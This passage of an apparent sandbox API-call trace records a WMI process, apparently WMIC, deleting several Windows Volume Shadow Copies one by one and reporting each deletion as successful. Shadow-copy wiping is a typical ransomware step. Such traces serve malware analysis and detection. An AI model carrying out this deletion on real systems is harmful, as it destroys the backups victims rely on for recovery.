varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{5555A914-627B-4AF5-A342-EC1A6421363A}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0190.326] free (_Block=0x28bfb0) [0190.326] malloc (_Size=0x800) returned 0x28d490 [0190.326] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x28d490, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0190.326] FormatMessageW (in: dwFlags=0x2500, lpSource=0x28d490, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x1cf898, nSize=0x0, Arguments=0x1cf8a8 | out: lpBuffer="쟠4") returned 0x67 [0190.326] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{5555A914-627B-4AF5-A342-EC1A6421363A}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0190.326] malloc (_Size=0x68) returned 0x28dca0 [0190.326] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{5555A914-627B-4AF5-A342-EC1A6421363A}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x28dca0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{5555A914-627B-4AF5-A342-EC1A6421363A}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0190.326] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff1d2ab0 [0190.326] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0190.326] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0190.326] free (_Block=0x28dca0) [0190.326] free (_Block=0x28d490) [0190.326] LocalFree (hMem=0x34c7e0) returned 0x0 [0190.326] IWbemServices:DeleteInstance (in: This=0x1db3c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{5555A914-627B-4AF5-A342-EC1A6421363A}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0191.244] IUnknown:Release (This=0x1db3d80) returned 0x0 [0191.244] malloc (_Size=0x800) returned 0x28d490 [0191.244] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x28d490, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0191.244] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0191.244] malloc (_Size=0x20) returned 0x28dca0 [0191.244] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x28dca0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0191.244] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff1d2ab0 [0191.244] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0191.244] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0191.306] free (_Block=0x28dca0) [0191.306] free (_Block=0x28d490) [0191.306] IEnumWbemClassObject:Next (in: This=0x1db3d18, lTimeout=-1, uCount=0x1, apObjects=0x1cf950, puReturned=0x1cf960 | out: apObjects=0x1cf950*=0x1db3d80, puReturned=0x1cf960*=0x1) returned 0x0 [0191.308] malloc (_Size=0x18) returned 0x28bfb0 [0191.308] IWbemClassObject:Get (in: This=0x1db3d80, wszName="__PATH", lFlags=0, pVal=0x1cf970*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ee1f8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf970*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{C7241040-5C13-409D-A239-55D005C03DE9}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0191.308] free (_Block=0x28bfb0) [0191.308] malloc (_Size=0x800) returned 0x28d490 [0191.308] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x28d490, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0191.308] FormatMessageW (in: dwFlags=0x2500, lpSource=0x28d490, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x1cf898, nSize=0x0, Arguments=0x1cf8a8 | out: lpBuffer="쟠4") returned 0x67 [0191.308] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{C7241040-5C13-409D-A239-55D005C03DE9}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0191.308] malloc (_Size=0x68) returned 0x28dca0 [0191.308] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{C7241040-5C13-409D-A239-55D005C03DE9}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x28dca0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{C7241040-5C13-409D-A239-55D005C03DE9}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0191.308] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff1d2ab0 [0191.308] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0191.308] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0191.309] free (_Block=0x28dca0) [0191.309] free (_Block=0x28d490) [0191.309] LocalFree (hMem=0x34c7e0) returned 0x0 [0191.309] IWbemServices:DeleteInstance (in: This=0x1db3c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{C7241040-5C13-409D-A239-55D005C03DE9}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0194.426] IUnknown:Release (This=0x1db3d80) returned 0x0 [0194.426] malloc (_Size=0x800) returned 0x28d490 [0194.426] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x28d490, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0194.426] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0194.426] malloc (_Size=0x20) returned 0x28dca0 [0194.426] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x28dca0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0194.426] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff1d2ab0 [0194.426] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0194.426] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0194.426] free (_Block=0x28dca0) [0194.426] free (_Block=0x28d490) [0194.426] IEnumWbemClassObject:Next (in: This=0x1db3d18, lTimeout=-1, uCount=0x1, apObjects=0x1cf950, puReturned=0x1cf960 | out: apObjects=0x1cf950*=0x1db3d80, puReturned=0x1cf960*=0x1) returned 0x0 [0195.872] malloc (_Size=0x18) returned 0x28bfb0 [0195.872] IWbemClassObject:Get (in: This=0x1db3d80, wszName="__PATH", lFlags=0, pVal=0x1cf970*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ee1f8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf970*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0195.872] free (_Block=0x28bfb0) [0195.872] malloc (_Size=0x800) returned 0x28d490 [0195.872] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x28d490, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0195.872] FormatMessageW (in: dwFlags=0x2500, lpSource=0x28d490, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x1cf898, nSize=0x0, Arguments=0x1cf8a8 | out: lpBuffer="쟠4") returned 0x67 [0195.872] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0195.872] malloc (_Size=0x68) returned 0x28dca0 [0195.872] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x28dca0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0195.872] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff1d2ab0 [0195.872] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0195.872] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0195.872] free (_Block=0x28dca0) [0195.872] free (_Block=0x28d490) [0195.872] LocalFree (hMem=0x34c7e0) returned 0x0 [0195.872] IWbemServices:DeleteInstance (in: This=0x1db3c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0197.162] IUnknown:Release (This=0x1db3d80) returned 0x0 [0197.162] malloc (_Size=0x800) returned 0x28d490 [0197.162] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x28d490, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0197.162] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0197.163] malloc (_Size=0x20) returned 0x28dca0 [0197.163] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x28dca0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0197.163] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff1d2ab0 [0197.163] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0197.163] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0197.163] free (_Block=0x28dca0) [0197.163] free (_Block=0x28d490) [0197.163] IEnumWbemClassObject:Next (in: This=0x1db3d18, lTimeout=-1, uCount=0x1, apObjects=0x1cf950, puReturned=0x1cf960 | out: apObjects=0x1cf950*=0x1db3d80, puReturned=0x1cf960*=0x1) returned 0x0 [0198.606] malloc (_Size=0x18) returned 0x28bfb0 [0198.606] IWbemClassObject:Get (in: This=0x1db3d80, wszName="__PATH", lFlags=0, pVal=0x1cf970*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ee1f8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf970*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0198.606] free (_Block=0x28bfb0) [0198.606] malloc (_Size=0x800) returned 0x28d490 [0198.606] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x28d490, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0198.606] FormatMessageW (in: dwFlags=0x2500, lpSource=0x28d490, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x1cf898, nSize=0x0, Arguments=0x1cf8a8 | out: lpBuffer="쟠4") returned 0x67 [0198.606] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0198.606] malloc (_Size=0x68) returned 0x28dca0 [0198.606] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x28dca0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0198.607] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff1d2ab0 [0198.607] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0198.607] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0198.607] free (_Block=0x28dca0) [0198.607] free (_Block=0x28d490) [0198.607] LocalFree (hMem=0x34c7e0) returned 0x0 [0198.607] IWbemServices:DeleteInstance (in: This=0x1db3c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0199.545] IUnknown:Release (This=0x1db3d80) returned 0x0 [0199.545] malloc (_Size=0x800) returned 0x28d490 [0199.545] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x28d490, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0199.545] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0199.545] malloc (_Size=0x20) returned 0x28dca0 [0199.545] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x28dca0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0199.545] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff1d2ab0 [0199.545] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0199.545] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0199.545] free (_Block=0x28dca0) [0199.545] free (_Block=0x28d490) [0199.545] IEnumWbemClassObject:Next (in: This=0x1db3d18, lTimeout=-1, uCount=0x1, apObjects=0x1cf950, puReturned=0x1cf960 | out: apObjects=0x1cf950*=0x1db3d80, puReturned=0x1cf960*=0x1) returned 0x0 [0199.546] malloc (_Size=0x18) returned 0x28bfb0 [0199.546] IWbemClassObject:Get (in: This=0x1db3d80, wszName="__PATH", lFlags=0, pVal=0x1cf970*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ee1f8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf970*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{E369493E-E5B4-449B-8539-770BCA375ABB}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0199.546] free (_Block=0x28bfb0) [0199.546] malloc (_Size=0x800) returned 0x28d490 [0199.546] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x28d490, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0199.546] FormatMessageW (in: dwFlags=0x2500, lpSource=0x28d490, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x1cf898, nSize=0x0, Arguments=0x1cf8a8 | out: lpBuffer="쟠4") returned 0x67 [0199.546] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{E369493E-E5B4-449B-8539-770BCA375ABB}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0199.546] malloc (_Size=0x68) returned 0x28dca0 [0199.546] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{E369493E-E5B4-449B-8539-770BCA375ABB}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x28dca0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{E369493E-E5B4-449B-8539-770BCA375ABB}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0199.546] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff1d2ab0 [0199.546] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0199.546] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0199.546] free (_Block=0x28dca0) [0199.546] free (_Block=0x28d490) [0199.546] LocalFree (hMem=0x34c7e0) returned 0x0 [0199.546] IWbemServices:DeleteInstance (in: This=0x1db3c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{E369493E-E5B4-449B-8539-770BCA375ABB}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0201.235] IUnknown:Release (This=0x1db3d80) returned 0x0 [0201.235] malloc (_Size=0x800) returned 0x28d490 [0201.235] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x28d490, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0201.235] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0201.235] malloc (_Size=0x20) returned 0x28dca0 [0201.235] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x28dca0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0201.235] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff1d2ab0 [0201.235] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0201.235] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0201.432] free (_Block=0x28dca0) [0201.432] free (_Block=0x28d490) [0201.432] IEnumWbemClassObject:Next (in: This=0x1db3d18, lTimeout=-1, uCount=0x1, apObjects=0x1cf950, puReturned=0x1cf960 | out: apObjects=0x1cf950*=0x0, puReturned=0x1cf960*=0x0) returned 0x1 [0201.433] IUnknown:Release (This=0x1db3d18) returned 0x0 [0201.435] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0201.435] free (_Block=0x28bf10) [0201.435] free (_Block=0x28beb0) [0201.435] GetCurrentThreadId () returned 0xb10 [0201.435] ??0CHString@@QEAA@PEBG@Z () returned 0x1cfb28 [0201.435] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0x1cfb28 [0201.435] lstrlenW (lpString="LIST") returned 4 [0201.435] lstrlenW (lpString="DELETE") returned 6 [0201.435] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0201.435] lstrlenW (lpString="ASSOC") returned 5 [0201.435] lstrlenW (lpString="DELETE") returned 6 [0201.435] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0201.435] lstrlenW (lpString="GET") returned 3 [0201.435] lstrlenW (lpString="DELETE") returned 6 [0201.435] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0201.437] ??1CHString@@QEAA@XZ () returned 0x4c50a801 [0201.437] WbemLocator:IUnknown:Release (This=0x1db3c18) returned 0x0 [0201.437] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0201.439] _kbhit () returned 0x0 [0201.443] free (_Block=0x28cc70) [0201.443] free (_Block=0x28bdb0) [0201.443] free (_Block=0x28bd90) [0201.443] free (_Block=0x28bd70) [0201.443] free (_Block=0x28bd50) [0201.443] free (_Block=0x286fa0) [0201.443] free (_Block=0x28be50) [0201.443] free (_Block=0x2885c0) [0201.443] free (_Block=0x28bed0) [0201.443] free (_Block=0x28cbf0) [0201.443] free (_Block=0x28be70) [0201.443] free (_Block=0x28bef0) [0201.443] free (_Block=0x289080) [0201.443] free (_Block=0x286f50) [0201.443] free (_Block=0x28cc40) [0201.443] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0201.443] free (_Block=0x289050) [0201.444] free (_Block=0x28bdf0) [0201.444] free (_Block=0x28be10) [0201.444] free (_Block=0x287ee0) [0201.444] free (_Block=0x287f30) [0201.444] free (_Block=0x287f80) [0201.444] free (_Block=0x28bdd0) [0201.444] free (_Block=0x286770) [0201.444] free (_Block=0x286f30) [0201.444] free (_Block=0x288040) [0201.444] free (_Block=0x286b10) [0201.444] free (_Block=0x288000) [0201.444] free (_Block=0x286ab0) [0201.444] free (_Block=0x286ad0) [0201.444] free (_Block=0x286990) [0201.444] free (_Block=0x2869b0) [0201.444] free (_Block=0x286930) [0201.444] free (_Block=0x286950) [0201.444] free (_Block=0x2869f0) [0201.444] free (_Block=0x286a10) [0201.444] free (_Block=0x286a50) [0201.444] free (_Block=0x286a70) [0201.444] free (_Block=0x286870) [0201.444] free (_Block=0x286890) [0201.445] free (_Block=0x286810) [0201.445] free (_Block=0x286830) [0201.445] free (_Block=0x2868d0) [0201.445] free (_Block=0x2868f0) [0201.445] free (_Block=0x2867b0) [0201.445] free (_Block=0x2867d0) [0201.445] free (_Block=0x286720) [0201.445] free (_Block=0x2866d0) [0201.445] free (_Block=0x28cb60) [0201.445] WbemLocator:IUnknown:Release (This=0x1da1390) returned 0x2 [0201.445] WbemLocator:IUnknown:Release (This=0x1db3b28) returned 0x0 [0201.445] WbemLocator:IUnknown:Release (This=0x1db3a98) returned 0x0 [0201.447] WbemLocator:IUnknown:Release (This=0x1da1390) returned 0x1 [0201.447] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0201.447] WbemLocator:IUnknown:Release (This=0x1da1390) returned 0x0 [0201.447] free (_Block=0x28bcd0) [0201.447] free (_Block=0x28bcf0) [0201.447] free (_Block=0x288540) [0201.447] free (_Block=0x28bd10) [0201.447] free (_Block=0x28bd30) [0201.447] free (_Block=0x288580) [0201.447] free (_Block=0x28bb50) [0201.447] free (_Block=0x28bb70) [0201.447] free (_Block=0x2883c0) [0201.447] free (_Block=0x28bb90) [0201.447] free (_Block=0x28bbb0) [0201.447] free (_Block=0x288400) [0201.447] free (_Block=0x28bad0) [0201.447] free (_Block=0x28baf0) [0201.447] free (_Block=0x288340) [0201.447] free (_Block=0x28bb10) [0201.447] free (_Block=0x28bb30) [0201.447] free (_Block=0x288380) [0201.447] free (_Block=0x28bc50) [0201.447] free (_Block=0x28bc70) [0201.447] free (_Block=0x2884c0) [0201.448] free (_Block=0x28bc90) [0201.448] free (_Block=0x28bcb0) [0201.448] free (_Block=0x288500) [0201.448] free (_Block=0x28ba50) [0201.448] free (_Block=0x28ba70) [0201.448] free (_Block=0x2882c0) [0201.448] free (_Block=0x28ba90) [0201.448] free (_Block=0x28bab0) [0201.448] free (_Block=0x288300) [0201.448] free (_Block=0x28bbd0) [0201.448] free (_Block=0x28bbf0) [0201.448] free (_Block=0x288440) [0201.448] free (_Block=0x28bc10) [0201.448] free (_Block=0x28bc30) [0201.448] free (_Block=0x288480) [0201.448] free (_Block=0x28b990) [0201.448] free (_Block=0x28b9b0) [0201.448] free (_Block=0x288200) [0201.448] free (_Block=0x28b850) [0201.448] free (_Block=0x28b870) [0201.448] free (_Block=0x2880c0) [0201.448] free (_Block=0x28b810) [0201.449] free (_Block=0x28b830) [0201.449] free (_Block=0x288080) [0201.449] free (_Block=0x28b8d0) [0201.449] free (_Block=0x28b8f0) [0201.449] free (_Block=0x288140) [0201.449] free (_Block=0x28b9d0) [0201.449] free (_Block=0x28b9f0) [0201.449] free (_Block=0x288240) [0201.449] free (_Block=0x28b890) [0201.449] free (_Block=0x28b8b0) [0201.449] free (_Block=0x288100) [0201.449] free (_Block=0x28b910) [0201.449] free (_Block=0x28b930) [0201.449] free (_Block=0x288180) [0201.449] free (_Block=0x28b950) [0201.449] free (_Block=0x28b970) [0201.449] free (_Block=0x2881c0) [0201.449] free (_Block=0x28ba10) [0201.449] free (_Block=0x28ba30) [0201.449] free (_Block=0x288280) [0201.450] CoUninitialize () [0201.491] exit (_Code=0) [0201.491] free (_Block=0x288fd0) [0201.491] free (_Block=0x287d90) [0201.491] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0201.491] free (_Block=0x2890a0) [0201.491] free (_Block=0x286790) [0201.491] free (_Block=0x287d50) [0201.491] free (_Block=0x287d10) [0201.491] free (_Block=0x287cc0) [0201.491] free (_Block=0x287c80) [0201.491] free (_Block=0x285ac0) [0201.491] free (_Block=0x287c00) [0201.491] free (_Block=0x285a80) [0201.491] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0201.491] free (_Block=0x28be30) Thread: id = 27 os_tid = 0xb34 Thread: id = 28 os_tid = 0xaf0 Thread: 